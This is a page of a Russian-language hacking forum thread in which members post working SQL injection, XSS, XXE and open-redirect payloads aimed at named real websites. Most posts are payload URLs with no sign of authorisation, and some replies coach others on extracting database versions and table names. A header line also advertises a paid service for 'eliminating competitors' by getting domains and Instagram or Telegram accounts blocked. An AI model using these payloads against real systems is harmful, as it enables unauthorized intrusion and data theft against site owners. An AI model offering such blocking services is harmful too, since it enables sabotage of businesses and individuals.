УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Уязвимости SQLi, XSS и другие.

Страница 30 из 35

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#291

15.01.2018, 05:25

joelblack

Guest

Сообщений: n/a

Провел на форуме:
70303

Репутация: 145

target: http://www.premium-network.ru

type: Time-based, Error-based

user:forumpt@localhost1

version:5.5.371

Time-based:

Код:

Code: www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15),1)--+

Error-based:

Код:

Code: http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(version(),floor(rand(0)*2))x,2,3%20from%20information_schema.tables%20group%20by%20x--+

#292

31.01.2018, 18:29

xaphan

Guest

Сообщений: n/a

Провел на форуме:
2260

Репутация: 4

OOB XXE

Код:

Code:
http://www.xmlforasp.net/SchemaValidator.aspx

XML Payload:

Код:

Code:

&test;

.dtd File:

Код:

Code:

">
%all;

#293

03.02.2018, 14:40

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от joelblack

joelblack said:
↑
target: http://www.premium-network.ru

type: Time-based, Error-based

user:forumpt@localhost1

version:5.5.371

Time-based:

Код:

Code: www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15),1)--+

Error-based:

Код:

Code: http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(version(),floor(rand(0)*2))x,2,3%20from%20information_schema.tables%20group%20by%20x--+

Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.

#294

03.02.2018, 15:28

st55

Guest

Сообщений: n/a

Провел на форуме:
52834

Репутация: 47

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.

Код:

Code:
70('UNION ALL SELECT 1,2,version(),3-- a)---

Вывод в мета-теге:

Код:

Code:

#295

03.02.2018, 19:24

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от st55

st55 said:
↑

Код:

Code:
70('UNION ALL SELECT 1,2,version(),3-- a)---

Вывод в мета-теге:

Код:

Code:

Код:

Code:

70'+union+select+1,version(),3,4--+

Тут же банально все, зачем скобки?

#296

04.02.2018, 03:16

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.boxofficemojo.com/.htaccess
[/COLOR][COLOR="#0000BB"]view[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]source[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.boxofficemojo.com/maintenance.html[/COLOR][/COLOR]

#297

04.02.2018, 19:35

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Sql Injection

Код:

Code:
http://www.ceadir-lunga.md/index.php?prm=999%27+UNION+ALL+SELECT+version()+--+&mid=201
http://retrofilms.in/forum/feedcat.php?id=2%27+union+all+select+1,2,3,4,5,6,7,8,9+--+

Мда редкость

Код:

Code:
http://katalogshop.md/tmp/

#298

16.02.2018, 23:00

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Код HTML:

HTML:
http://pravoslavsad4.ru/view_index21b.php?id=-1%27%20UnIon%20SeLEct%201%2C2%2C3%2C4%2C5%2C6%2C0x3c7363726970743e616c65727428646f63756d656e742e646f6d61696e293c2f7363726970743e%20--%20-

#299

06.03.2018, 22:45

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от x4t3a

x4t3a said:
↑
sqli:
http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637 UNION ALL SELECT 1,2,3
а дальше не получается раскрутить

Что не получается? П.С только сейчас увидел ты это аттак

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//атаксупермаркет.рф/goods.aspx?id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN+('yml_catalog','shop','email','currencies','currency','categories','category','offers','offer','categoryId','picture','orderingTime','onstock','ordering'))+--+[/COLOR][/COLOR]

Дальше сам

Код HTML:

HTML:
https://rdot.org/forum/showthread.php?t=826

#300

17.03.2018, 19:11

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Код HTML:

HTML:
https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org
http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20=

OpenRedirect

Код HTML:

HTML:
https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%33%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9,0,1+--+-

Страница 30 из 35

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход